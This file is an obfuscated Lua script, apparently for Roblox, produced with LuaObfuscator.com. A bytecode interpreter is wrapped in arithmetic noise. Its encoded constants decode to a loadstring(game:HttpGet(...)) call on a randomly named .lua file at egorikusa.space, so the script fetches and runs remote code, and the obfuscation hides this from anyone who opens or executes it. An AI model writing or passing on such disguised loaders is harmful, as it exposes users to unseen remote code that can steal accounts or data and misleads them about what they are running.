--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v82,v19);v19=nil;v99=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%(2^(((v33-1) -(v32-(1 -0))) + ((1 + 1) -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=(879 -(282 + 595))^(v32-(932 -(857 + 74))) ;return (((v31%(v84 + v84))>=v84) and (569 -((2004 -(1523 + 114)) + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1024 + 20)) );v18=v18 + (17 -(3 + 10)) ;return (v40 * (16777333 -(32 + 85))) + (v39 * 65536) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==0) then v42=v23();v43=v23();v41=1 -0 ;end if (v41==(4 -1)) then if (v46==(350 -(5 + 82 + 263))) then if (v45==((64 + 116) -(67 + 113))) then return v47 * (0 + 0) ;else local v101=0 -0 ;while true do if (v101==(0 -0)) then v46=1 + 0 ;v44=0;break;end end end elseif (v46==(879 + 1168)) then return ((v45==(0 -0)) and (v47 * ((886 -(261 + 624))/(952 -(802 + 150))))) or (v47 * NaN) ;end return v8(v47,v46-(2753 -1730) ) * (v44 + (v45/((3 -(1 -0))^((1118 -(1020 + 60)) + 14)))) ;end if (v41==2) then v46=v20(v43,1018 -(915 + 82) ,87 -56 );v47=((v20(v43,804 -(201 + 571) )==(1 + 0)) and  -(1139 -(116 + 1022))) or (1 -0) ;v41=1190 -(1069 + 118) ;end if (v41==((1426 -(630 + 793)) -2)) then v44=2 -1 ;v45=(v20(v43,1 -0 ,20) * ((1 + 1)^(56 -24))) + v42 ;v41=(6 -4) + 0 ;end end end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(9 -7)) then v51={};for v88=1 + 0 , #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=9 -6 ;end if (v49==(1747 -(760 + 987))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1914 -(1789 + 124) ;end if ((769 -(745 + 21))==v49) then return v6(v51);end if (v49==(3 -2)) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=1 + 0 + 1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 1824 -(1195 + 629) ;end)();while true do if (v66~=(1 -0)) then else if (v52==1) then local v94=(function() return 0;end)();local v95=(function() return;end)();while true do if (v94==0) then v95=(function() return 0;end)();while true do if (v95==(243 -(187 + 54))) then v52=(function() return 2;end)();break;end if (v95~=(781 -(162 + 618))) then else v59=(function() return {};end)();for v161= #":",v58 do local v162=(function() return 0 + 0 ;end)();local v163=(function() return;end)();local v164=(function() return;end)();local v165=(function() return;end)();while true do if (v162==(0 + 0)) then local v174=(function() return 0 -0 ;end)();while true do if (v174~=1) then else v162=(function() return 1 -0 ;end)();break;end if (v174==(0 + 0)) then v163=(function() return 0;end)();v164=(function() return nil;end)();v174=(function() return 1637 -(1373 + 263) ;end)();end end end if (v162~=(1001 -(451 + 549))) then else v165=(function() return nil;end)();while true do if (v163==1) then if (v164== #"]") then v165=(function() return v21()~=(0 + 0) ;end)();elseif (v164==(2 -0)) then v165=(function() return v24();end)();elseif (v164== #"91(") then v165=(function() return v25();end)();end v59[v161]=(function() return v165;end)();break;end if (v163~=0) then else v164=(function() return v21();end)();v165=(function() return nil;end)();v163=(function() return 1 -0 ;end)();end end break;end end end v95=(function() return 2;end)();end if (v95~=(1384 -(746 + 638))) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v95=(function() return 1 -0 ;end)();end end break;end end end break;end if (0==v66) then if (2~=v52) then else v57[ #"19("]=(function() return v21();end)();for v102= #"{",v23() do local v103=(function() return 341 -(218 + 123) ;end)();local v104=(function() return;end)();while true do if (v103~=0) then else v104=(function() return v21();end)();if (v20(v104, #",", #":")~=0) then else local v154=(function() return 0;end)();local v155=(function() return;end)();local v156=(function() return;end)();local v157=(function() return;end)();while true do if (v154~=(1581 -(1535 + 46))) then else v155=(function() return v20(v104,2, #"-19");end)();v156=(function() return v20(v104, #"xnxx",6);end)();v154=(function() return 1 + 0 ;end)();end if (v154==2) then if (v20(v156, #"|", #":")~= #" ") then else v157[1 + 1 ]=(function() return v59[v157[562 -(306 + 254) ]];end)();end if (v20(v156,2,1 + 1 )== #">") then v157[ #"91("]=(function() return v59[v157[ #"91("]];end)();end v154=(function() return 5 -2 ;end)();end if (v154~=(1468 -(899 + 568))) then else local v171=(function() return 0 + 0 ;end)();local v172=(function() return;end)();while true do if (v171==(0 -0)) then v172=(function() return 603 -(268 + 335) ;end)();while true do if (v172==(291 -(60 + 230))) then v154=(function() return 574 -(426 + 146) ;end)();break;end if (v172==0) then local v181=(function() return 0 + 0 ;end)();while true do if ((1457 -(282 + 1174))==v181) then v172=(function() return 1;end)();break;end if (v181~=(811 -(569 + 242))) then else v157=(function() return {v22(),v22(),nil,nil};end)();if (v155==0) then local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();while true do if (v182==0) then v183=(function() return 0 + 0 ;end)();while true do if ((1024 -(706 + 318))~=v183) then else v157[ #"91("]=(function() return v22();end)();v157[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v155== #"]") then v157[ #"asd"]=(function() return v23();end)();elseif (v155==2) then v157[ #"asd"]=(function() return v23() -((1253 -(721 + 530))^(1287 -(945 + 326))) ;end)();elseif (v155== #"19(") then local v190=(function() return 0 -0 ;end)();local v191=(function() return;end)();while true do if (v190==0) then v191=(function() return 0 + 0 ;end)();while true do if (v191==0) then v157[ #"nil"]=(function() return v23() -(2^16) ;end)();v157[ #"0313"]=(function() return v22();end)();break;end end break;end end end v181=(function() return 1;end)();end end end end break;end end end if (v154~=(703 -(271 + 429))) then else if (v20(v156, #"19(", #"nil")~= #"}") then else v157[ #"xnxx"]=(function() return v59[v157[ #"asd1"]];end)();end v54[v102]=(function() return v157;end)();break;end end end break;end end end for v105= #"\\",v23() do v55,v105,v28=(function() return v53(v55,v105,v28);end)();end return v57;end if (v52~=0) then else local v97=(function() return 0;end)();local v98=(function() return;end)();while true do if (0==v97) then v98=(function() return 0;end)();while true do if (v98~=(1 + 0)) then else v55=(function() return {};end)();v56=(function() return {};end)();v98=(function() return 2;end)();end if (v98~=(1500 -(1408 + 92))) then else v53=(function() return function(v166,v167,v168) local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169~=0) then else v170=(function() return 1086 -(461 + 625) ;end)();while true do if (v170==(1288 -(993 + 295))) then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (v179==(0 + 0)) then v180=(function() return 0;end)();while true do if (v180==(1171 -(418 + 753))) then local v184=(function() return 0;end)();while true do if (v184==(0 + 0)) then v166[v167-#" " ]=(function() return v168();end)();return v166,v167,v168;end end end end break;end end end end break;end end end;end)();v54=(function() return {};end)();v98=(function() return 1;end)();end if (2==v98) then v52=(function() return 1;end)();break;end end break;end end end v66=(function() return 1;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1 + 1 ];local v65=v60[1 + (755 -(239 + 514)) ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=530 -(406 + 123) ;local v72= -(1770 -(1749 + 8 + 12));local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v85=1322 -(1249 + 73) ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 + 0 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + (1330 -(797 + 532)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1146 -(466 + 679) ];if (v80<=4) then if (v80<=((2 + 0) -1)) then if (v80>0) then local v106=v79[2];local v107,v108=v70(v77[v106](v13(v77,v106 + (2 -1) ,v79[3])));v72=(v108 + v106) -(1901 -(36 + 70 + 1794)) ;local v109=0 + (0 -0) ;for v121=v106,v72 do v109=v109 + 1 + 0 ;v77[v121]=v107[v109];end else local v110=0;local v111;local v112;local v113;local v114;local v115;while true do if ((2253==2253) and (v110==(0 -0))) then v111=nil;v112,v113=nil;v114=nil;v115=nil;v77[v79[5 -3 ]]={};v110=115 -(4 + 110) ;end if (v110==((1791 -(373 + 829)) -(57 + 527))) then v115=v79[1429 -(41 + 1386) ];v112,v113=v70(v77[v115](v13(v77,v115 + (104 -(17 + 86)) ,v79[3 + 0 ])));v72=(v113 + v115) -1 ;v111=0;for v158=v115,v72 do v111=v111 + (1 -0) ;v77[v158]=v112[v111];end v110=17 -11 ;end if (v110==(170 -(122 + 44))) then v71=v71 + (1 -0) ;v79=v67[v71];v77[v79[6 -4 ]]=v79[3]~=0 ;v71=v71 + 1 + 0 ;v79=v67[v71];v110=5;end if ((452==452) and (v110==(734 -(476 + 255)))) then v77[v115 + 1 + 0 ]=v114;v77[v115]=v114[v79[4]];v71=v71 + (1 -0) ;v79=v67[v71];v77[v79[(1197 -(369 + 761)) -(30 + 35) ]]=v79[3 + 0 ];v110=1261 -(1043 + 214) ;end if (v110==((2 + 1) -2)) then v71=v71 + ((2203 -990) -(323 + 889)) ;v79=v67[v71];v77[v79[5 -3 ]]=v62[v79[583 -(361 + 219) ]];v71=v71 + ((608 -287) -(53 + (505 -(64 + 174)))) ;v79=v67[v71];v110=1 + 1 ;end if ((v110==((60 + 360) -(15 + (588 -190)))) or (4557<2087)) then v79=v67[v71];v77[v79[984 -(18 + 964) ]]();v71=v71 + ((339 -(144 + 192)) -2) ;v79=v67[v71];do return;end break;end if (v110==(2 + 0)) then v77[v79[2 + 0 ]]=v62[v79[853 -((236 -(42 + 174)) + 624 + 206) ]];v71=v71 + 1 + 0 + 0 ;v79=v67[v71];v115=v79[128 -(116 + 5 + 5) ];v114=v77[v79[1 + 2 ]];v110=741 -(542 + 196) ;end if ((3874==3874) and (v110==(12 -6))) then v71=v71 + 1 + 0 ;v79=v67[v71];v115=v79[2 + (1504 -(363 + 1141)) ];v77[v115]=v77[v115](v13(v77,v115 + 1 + 0 ,v72));v71=v71 + (2 -1) ;v110=17 -(1590 -(1183 + 397)) ;end end end elseif ((v80<=(1553 -(1126 + (1293 -868)))) or (1938>4935)) then do return;end elseif (v80>(408 -(118 + 287))) then v77[v79[2]]();else local v124=v79[7 -5 ];v77[v124]=v77[v124](v13(v77,v124 + (1122 -(87 + 31 + 1003)) ,v72));end elseif (v80<=(17 -11)) then if (v80>(382 -(142 + 235))) then v77[v79[9 -7 ]]=v62[v79[1 + 2 ]];else v77[v79[979 -(553 + 424) ]]=v79[5 -(2 + 0) ];end elseif ((v80<=(7 + 0)) or (4255<3423)) then v77[v79[2 + 0 ]]={};elseif (v80>(5 + 3)) then v77[v79[2]]=v79[2 + 1 ]~=(0 + 0) ;else local v127=v79[4 -2 ];local v128=v77[v79[7 -4 ]];v77[v127 + (2 -1) ]=v128;v77[v127]=v128[v79[2 + 2 ]];end v71=v71 + (4 -3) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F623162323765613862366131382Q613965333065616432302E6C7561000A9Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
